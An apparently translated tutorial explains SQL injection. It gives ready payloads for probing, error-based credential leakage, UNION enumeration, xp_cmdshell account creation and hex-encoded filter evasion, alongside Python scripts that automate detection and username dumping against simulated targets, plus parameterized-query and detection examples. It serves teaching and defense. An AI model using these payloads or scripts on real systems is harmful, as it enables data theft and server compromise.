2025-01-17 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains "what are the ways of SQL injection". The content is kept simple and concrete; follow the examples below to understand how each technique works.
There are three basic types of SQL injection: 1. numeric injection, possible when the input parameter is an integer; 2. character (string) injection, possible when the input parameter is a string; 3. search injection, where a search keyword is inserted into the query without being filtered.
SQL injection principle
A SQL injection attack feeds specially constructed input to a Web application as a parameter. Most of that input is a fragment of SQL syntax, so when the application concatenates it into a query the database executes the statement the attacker wanted. The root cause is that the program does not carefully validate or escape user-supplied data before using it in SQL, so hostile data reaches the database as code.
SQL injection classification
1. Numeric injection
A numeric injection vulnerability may exist when the input parameter is an integer.
Suppose there is a URL: http://www.aaa.com/test.php?id=1
You can guess that the back-end SQL statement is:
SELECT * FROM table WHERE id=1
Steps to confirm a numeric injection point:
① First append a single quotation mark ' to the parameter.
The SQL statement becomes:
SELECT * FROM table WHERE id=1'
This is a syntax error, so the statement fails, the script gets no data from the database, and the page renders differently from the original (an error or an empty page).
② Then append and 1 = 1 to the parameter.
The SQL statement becomes:
SELECT * FROM table WHERE id=1 and 1 = 1
The statement is syntactically correct and executes normally; the data returned is identical to the original request.
③ Finally append and 1 = 2 to the parameter.
The SQL statement becomes:
SELECT * FROM table WHERE id=1 and 1 = 2
The syntax is correct and the statement executes, but since 1 = 2 is always false no row matches, so the returned data differs from the original request.
If all three observations hold, the parameter is very likely vulnerable to numeric SQL injection. Steps ② and ③ are the more reliable pair: an application that returns a generic error page for any malformed input can hide the difference in step ①, but a true condition that leaves the page unchanged next to a false condition that empties it is hard to explain any other way.
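The three-step test above (and the quote-closing variant used for string parameters in the next section) can be scripted. The following Python is an added example, not code from the original article: it builds the guessed back-end query by string concatenation against a constructed in-memory SQLite table, runs the quote / true-condition / false-condition probes, and compares each response with the baseline. The `users` table, its rows and the function names are made up for the example, and SQLite stands in for the web application's database; the parameterized query at the end shows the fix for the "data not filtered" root cause the article names.

```python
import sqlite3

# Constructed sample table; stands in for the application's real users table.
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "bob", "hunter2"), (3, "eve", "pw")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def vulnerable_numeric(conn, user_id):
    # The article's guessed back-end query for test.php?id=..., concatenated verbatim.
    return conn.execute(f"SELECT * FROM users WHERE id={user_id}").fetchall()

def vulnerable_character(conn, username):
    # Same flaw for a string parameter: the value sits inside single quotes.
    return conn.execute(f"SELECT * FROM users WHERE username = '{username}'").fetchall()

# Probe suffixes appended to the legitimate value, one set per parameter type.
# Character probes close the string with ' and comment out the original closing quote.
NUMERIC_PROBES = {"quote": "'", "true": " and 1=1", "false": " and 1=2"}
CHARACTER_PROBES = {"quote": "'", "true": "' and 1=1-- ", "false": "' and 1=2-- "}

def run_probe(run, value):
    """Execute one request; an SQL error becomes a string so it can be compared."""
    try:
        return run(value)
    except sqlite3.Error as exc:
        return f"error: {exc}"

def looks_injectable(run, base, probes):
    """The article's three observations: quote -> error, and 1=1 -> same as
    baseline, and 1=2 -> different from baseline."""
    baseline = run(base)
    results = {name: run_probe(run, base + suffix) for name, suffix in probes.items()}
    quote_breaks = isinstance(results["quote"], str)
    true_same = results["true"] == baseline
    false_differs = results["false"] != baseline
    return quote_breaks and true_same and false_differs

def safe_character(conn, username):
    # The fix: bind the value as a parameter; it is never parsed as SQL.
    return conn.execute("SELECT * FROM users WHERE username = ?", (username,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("id param injectable:",
          looks_injectable(lambda v: vulnerable_numeric(db, v), "1", NUMERIC_PROBES))
    print("username param injectable:",
          looks_injectable(lambda v: vulnerable_character(db, v), "admin", CHARACTER_PROBES))
    print("parameterized query given the payload:", safe_character(db, "admin' and 1=1-- "))
```

Run against the parameterized version, the same probes report "not injectable": the quote no longer breaks the statement, and the boolean suffixes are simply part of a username that matches nothing.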
2. Character injection
A character injection vulnerability may exist when the input parameter is a string. The biggest difference from numeric injection is that a numeric value is not enclosed in quotes, while a string value generally is, so the injected input must close that quote.
The key to character injection is therefore how to close the original string in the SQL statement and comment out the leftover code after the injection point.
Suppose the back-end SQL statement is:
SELECT * FROM table WHERE username = 'admin'
Steps to confirm a character injection point:
① First enter admin' (the value followed by a single quote) to test.
The SQL statement becomes:
SELECT * FROM table WHERE username = 'admin''
The quotes are unbalanced, so the statement fails and the page is abnormal.
② Enter: admin' and 1 = 1--
Note: the single quote after admin closes the string, and the trailing -- starts a comment that swallows the original closing quote. Leave a space after the two dashes: SQL Server does not need it, but MySQL only treats -- as a comment when whitespace follows it.
The SQL statement becomes:
SELECT * FROM table WHERE username = 'admin' and 1 = 1--'
The page displays normally.
③ Enter: admin' and 1 = 2--
The SQL statement becomes:
SELECT * FROM table WHERE username = 'admin' and 1 = 2--'
It executes, but the condition is always false, so the page shows no data or renders abnormally. If all three observations match, the parameter is likely vulnerable to character SQL injection.
Error messages can leak data as well as confirm the injection point. Replace the constant condition with a comparison between the integer 1 and a subquery that returns a string, for example:
SELECT * FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users)
The database then reports a conversion error, on current SQL Server versions of the form:
Conversion failed when converting the varchar value 'root' to data type int.
This reveals the username root. The subquery SELECT TOP 1 username FROM users returns the first username as a varchar, which is then compared with the int 1; the two types cannot be compared directly, so SQL Server tries to convert the varchar to int, the conversion fails, and the error message quotes the offending value, leaking it to the attacker.
Using this method, all account information can be extracted one row at a time:
SELECT * FROM users WHERE username = 'abc' AND password = 'abc' AND 1 > (SELECT TOP 1 username FROM users WHERE username NOT IN ('root'))
Each name already recovered is added to the NOT IN list and the statement yields the next one (TOP 1 without ORDER BY returns an arbitrary row, but excluding the known names still walks the whole table). Replacing username in the subquery with another column name extracts that column instead; that is not repeated here.
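The extraction loop described above, as an added Python example that is not part of the original article. It generates the page's payload shape for the username parameter, grows the NOT IN exclusion list with every name recovered, and parses the leaked value out of SQL Server's conversion error text. There is no real server here, so a simulated responder returns that error text for a constructed list of usernames; the function names, the `users`/`username` identifiers and the sample names are assumptions of the example.

```python
import re

# Constructed usernames standing in for the target's users table (not from the article).
# The simulated server hands them out in list order, as TOP 1 would on a small table;
# a real server makes no ordering promise without ORDER BY.
SIMULATED_USERS = ["root", "alice", "bob"]

# SQL Server error 245 quotes the offending value; that quoted value is the leak.
CONVERSION_ERROR = re.compile(r"converting the n?varchar value '(.*?)' to data type int")

def build_payload(known):
    """Value for the username parameter: close the string, then force the
    varchar-vs-int comparison on the first username not yet recovered."""
    if known:
        excluded = ", ".join("'" + name.replace("'", "''") + "'" for name in known)
        subquery = f"SELECT TOP 1 username FROM users WHERE username NOT IN ({excluded})"
    else:
        subquery = "SELECT TOP 1 username FROM users"
    return f"abc' AND 1 > ({subquery})--"

def leaked_value(response):
    """Pull the quoted value out of the error text, or None if no error came back."""
    match = CONVERSION_ERROR.search(response)
    return match.group(1) if match else None

def dump_usernames(send, limit=100):
    """Drive the loop: each round excludes every name already recovered; stop when
    the subquery finds no row (then 1 > NULL is UNKNOWN and no error is raised)."""
    known = []
    while len(known) < limit:
        value = leaked_value(send(build_payload(known)))
        if value is None:
            break
        known.append(value)
    return known

def simulated_server(payload):
    """Stand-in for the vulnerable page (assumption: it echoes SQL Server's error text).
    It only understands the payload shape build_payload emits."""
    match = re.search(r"NOT IN \((.*)\)\)--$", payload)
    excluded = set()
    if match:
        quoted = re.findall(r"'((?:[^']|'')*)'", match.group(1))
        excluded = {s.replace("''", "'") for s in quoted}
    remaining = [u for u in SIMULATED_USERS if u not in excluded]
    if not remaining:
        return "<page rendered with no rows>"
    return f"Conversion failed when converting the varchar value '{remaining[0]}' to data type int."

if __name__ == "__main__":
    print(build_payload([]))
    print(dump_usernames(simulated_server))
```

The `send` callable is the only part that touches a target; swapping the simulator for an HTTP request that returns the response body is all that changes, and the parser still has to be matched to the exact error text the application exposes.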
2. Get metadata
SQL Server provides many views for reading metadata. First guess the number of columns in the current table, then construct a UNION statement that pulls the metadata into the result set, such as:
SELECT ... FROM ... WHERE id = ... UNION SELECT 1, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
If the current table has two columns, this UNION returns the names of the tables in the current database. How to determine the number of columns in the current table is described below.
Some common system database views:
SYS.DATABASES: all databases in the SQL Server instance
SYS.SQL_LOGINS: all SQL Server logins
INFORMATION_SCHEMA.TABLES: all tables in the current user database
INFORMATION_SCHEMA.COLUMNS: all columns in the current user database
SYS.ALL_COLUMNS: all columns of user-defined objects and system objects combined
SYS.DATABASE_PRINCIPALS: every principal (user, role, application role) in the database
SYS.DATABASE_FILES: the files that make up the database
SYSOBJECTS: every object created in the database (constraints, defaults, logs, rules, stored procedures and so on)
3. Guessing the number of columns with ORDER BY
You can use ORDER BY to determine the number of columns in the current table.
Such as:
① SELECT * FROM users WHERE id = 1 (executes normally)
② SELECT * FROM users WHERE id = 1 ORDER BY 1 (sort by the first column; executes normally)
③ SELECT * FROM users WHERE id = 1 ORDER BY 2 (sort by the second column; executes normally)
④ SELECT * FROM users WHERE id = 1 ORDER BY 3 (sort by the third column; executes normally)
⑤ SELECT * FROM users WHERE id = 1 ORDER BY 4 (sort by the fourth column; raises an error)
Therefore the current table has exactly three columns: sorting by a fourth column that does not exist makes the statement fail. This method also works on Oracle and MySQL.
Once the number of columns is known, the attacker usually proceeds to the next step with the UNION keyword.
4. UNION query
The UNION keyword combines the results of two or more queries into a single result set, and most databases support it. The result sets being merged must obey two basic rules:
The number of columns in every query must be the same
The data types of corresponding columns must be compatible
① Guessing the number of columns with UNION
Besides ORDER BY, the column count can also be found with UNION.
Suppose the users table in this example has four columns. Appending a UNION with a single column:
SELECT * FROM users WHERE id = 1 UNION SELECT 1
makes the database raise an error, because the two sides have different numbers of columns.
Increase the number of columns one at a time until no error is produced; the count at which the statement succeeds is the number of columns in the users table:
UNION SELECT 1,2 then UNION SELECT 1,2,3 and so on.
It is better to use NULL instead of numbers after SELECT: NULL is compatible with every column type, so a type-mismatch error cannot be confused with a wrong column count.
② UNION query for sensitive information
Once the column count is known to be 4, injection can continue with a statement such as:
UNION SELECT 'x', NULL, NULL, NULL FROM SYSOBJECTS WHERE xtype='U' (Note: xtype='U' selects objects of type user table)
If the type of the first column is incompatible with the string, the database reports an error; move the string literal to another position and retry until the statement is accepted. Once it executes normally, replace the placeholder 'x' with the column whose value you want, for example name to list the user tables, or any other expression that returns sensitive data.
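The ORDER BY and UNION column-count methods and the follow-up UNION against the object catalog, combined in one added Python example that is not from the original article. It runs against a constructed in-memory SQLite database, so sqlite_master WHERE type='table' plays the role of SYSOBJECTS WHERE xtype='U'; the schema, rows and function names are made up, and the vulnerable query is the page's guessed SELECT * FROM users WHERE id = ... with the parameter concatenated in.

```python
import sqlite3

# Constructed schema and rows (not from the article); `orders` exists only so the
# catalog listing has more than one table to show.
SAMPLE_USERS = [(1, "admin", "s3cret"), (2, "bob", "hunter2")]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE orders (id INTEGER, item TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def vulnerable_query(conn, user_id):
    # The article's guessed back-end query with the id parameter concatenated in.
    return conn.execute(f"SELECT * FROM users WHERE id = {user_id}").fetchall()

def count_columns_order_by(run, base, max_cols=32):
    """ORDER BY n succeeds while n <= column count and errors once n exceeds it."""
    for n in range(1, max_cols + 1):
        try:
            run(f"{base} ORDER BY {n}")
        except sqlite3.Error:
            return n - 1
    return None

def count_columns_union(run, base, max_cols=32):
    """UNION SELECT NULL, NULL, ... errors until the column count matches.
    NULL is used instead of 1, 2, 3 so no type-mismatch error masks the result."""
    for n in range(1, max_cols + 1):
        try:
            run(f"{base} UNION SELECT {', '.join(['NULL'] * n)}")
            return n
        except sqlite3.Error:
            continue
    return None

def list_tables(run, base, ncols):
    """Pad the UNION to ncols and read table names from the catalog.
    sqlite_master WHERE type='table' stands in for SYSOBJECTS WHERE xtype='U'."""
    padding = ", NULL" * (ncols - 1)
    rows = run(f"{base} UNION SELECT name{padding} FROM sqlite_master WHERE type='table'")
    # Rows of the original query come back too; keep only the string names we injected.
    return sorted(row[0] for row in rows if isinstance(row[0], str))

def recon(conn, base="1"):
    run = lambda value: vulnerable_query(conn, value)
    by_order = count_columns_order_by(run, base)
    by_union = count_columns_union(run, base)
    tables = list_tables(run, base, by_union) if by_union else []
    return by_order, by_union, tables

if __name__ == "__main__":
    print(recon(make_db()))  # column count by both methods, then the table names
```

Both counting methods should agree; when they do not, the usual cause is that the application hides one class of error (for example it shows a generic page for the ORDER BY failure but passes the UNION error through), so run both before trusting either.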
5. Using the system functions provided by SQL Server
SQL Server provides many system functions that return information from the system tables without having to query those tables directly.
Such as:
SELECT suser_name(): returns the login name of the current user
SELECT user_name(): returns the database user name (of the current user, or of the user with a given ID)
SELECT db_name(): returns the name of the current database
SELECT is_member('db_owner'): returns 1 if the current user is a member of the db_owner database role, 0 if not
SELECT convert(int, '5'): converts a value to another data type (the same conversion that, applied to a non-numeric string, produces the error message used above)
6. Stored procedure
Stored procedures are precompiled sets of SQL statements stored in the database. Large database systems ship many system and extended stored procedures that do far more than query data, for example running operating system commands, reading the registry or listing disk directories.
The stored procedure most commonly abused by attackers is xp_cmdshell, which executes operating system commands.
For example, if http://www.aaa.org/test.aspx?id=1 is an injection point, an attacker can stack a second statement onto it:
http://www.aaa.org/test.aspx?id=1;exec xp_cmdshell 'net user test test /add'
The SQL finally executed is:
SELECT * FROM table WHERE id=1; exec xp_cmdshell 'net user test test /add'
The statement after the semicolon creates a Windows user named test with the password test on the database server.
Note: not every database user can call such procedures; the caller needs the CONTROL SERVER permission or membership in the sysadmin role (a non-sysadmin login can only run it if EXECUTE has been granted explicitly and a proxy account has been configured). In addition, xp_cmdshell is disabled by default in current SQL Server versions and has to be switched on through sp_configure before it works at all.
Commonly abused stored procedures:
sp_addlogin: creates a new SQL Server login, letting a user connect with SQL Server authentication
sp_dropuser: removes a database user
xp_enumgroups: lists the local Microsoft Windows groups, or the global groups in a specified Windows domain
xp_regread: reads the registry
xp_regwrite: writes to the registry
xp_regdeletevalue: deletes a registry value
xp_dirtree: lists a directory tree
sp_password: changes a password
xp_servicecontrol: stops or starts a service
In addition, every database requires specific permissions for its special functions and stored procedures. The common SQL Server fixed server roles and their permissions are:
bulkadmin: can run BULK INSERT statements
dbcreator: can create, alter, drop and restore any database
diskadmin: can manage disk files
processadmin: can end processes running in an instance of the Database Engine
securityadmin: can manage logins and their properties; can GRANT, DENY and REVOKE server-level permissions, and database-level permissions in databases it has access to; can also reset the passwords of SQL Server logins
serveradmin: can change server-wide configuration options and shut down the server
setupadmin: can add and remove linked servers, and can execute some system stored procedures
sysadmin: can perform any activity in the Database Engine
7. Dynamic execution
SQL Server supports dynamic execution of statements: a string can be submitted and executed as SQL.
For example: exec ('SELECT username, password FROM users')
The statement can also be supplied to exec as a hexadecimal literal. Most Web applications and firewalls filter single quotation marks; a hex-encoded statement executed through exec contains no quote at all, which gets past many firewalls and anti-injection filters. For example:
DECLARE @query VARCHAR(8000)
SELECT @query = 0x73656C6563742031
EXEC(@query)
0x73656C6563742031 is the hex encoding of the string select 1; assigning it to a varchar variable converts the bytes back into that text, and EXEC runs it. (The declaration needs a length: in SQL Server, VARCHAR without one holds a single character, which would truncate the payload.)
Or, with comments in place of whitespace to evade filters that key on spaces:
DECLARE/**/@query/**/VARCHAR(8000)/**/SELECT/**/@query=0x73656C6563742031/**/EXEC(@query)
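From the defender's side, the two evasions just described (comments in place of whitespace, and hex literals in place of quoted SQL) can be undone before a request parameter is inspected. The following Python normalizer is an added example, not from the original article: it replaces /**/ padding with spaces, decodes 0x literals that are printable text, and applies a simple keyword heuristic. The sample parameter values are constructed for the example; two of them carry the page's 0x73656C6563742031 payload, and the keyword list is a placeholder for whatever rules a real filter uses.

```python
import re

# Constructed request parameter values (not from the article). "hex" carries the
# page's 0x73656C6563742031 payload; "padded" is the comment-for-whitespace variant.
SAMPLES = {
    "benign": "id=1",
    "hex": "id=1;DECLARE @query VARCHAR(8000) SELECT @query=0x73656C6563742031 EXEC(@query)",
    "padded": "id=1;DECLARE/**/@query/**/VARCHAR(8000)/**/SELECT/**/@query=0x73656C6563742031/**/EXEC(@query)",
}

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")
# Keyword heuristic for demonstration only; a production rule set is parser-based and tuned.
SQL_KEYWORDS = re.compile(r"\b(exec|execute|xp_cmdshell|declare|union|select)\b", re.IGNORECASE)

def _decode_literal(match):
    """Turn 0x... into the text it encodes when every byte is printable ASCII;
    leave genuine binary (or odd-length) literals untouched."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    raw = bytes.fromhex(digits)
    if all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return match.group(0)

def normalize(param):
    """Undo the two evasions: /* */ comments act as whitespace, and hex literals
    stand in for quoted strings. Collapse whitespace so the variants compare equal."""
    text = re.sub(r"/\*.*?\*/", " ", param, flags=re.S)
    text = HEX_LITERAL.sub(_decode_literal, text)
    return re.sub(r"\s+", " ", text).strip()

def decoded_hex_strings(param):
    """Only the decoded literals, so an analyst sees what EXEC would have run."""
    return [bytes.fromhex(h).decode("ascii", "replace")
            for h in HEX_LITERAL.findall(param) if len(h) % 2 == 0]

def is_suspicious(param):
    """Flag when SQL keywords appear once the parameter has been normalized."""
    return SQL_KEYWORDS.search(normalize(param)) is not None

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(name, is_suspicious(value), normalize(value))
```

Normalizing before matching is the point: a filter that only looks for quotes or for "exec " with a trailing space sees nothing wrong with either encoded sample, while the normalized forms of both are identical and contain the statement the database would actually run.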
That concludes this overview of the ways SQL injection is carried out; the specific techniques need to be verified in practice.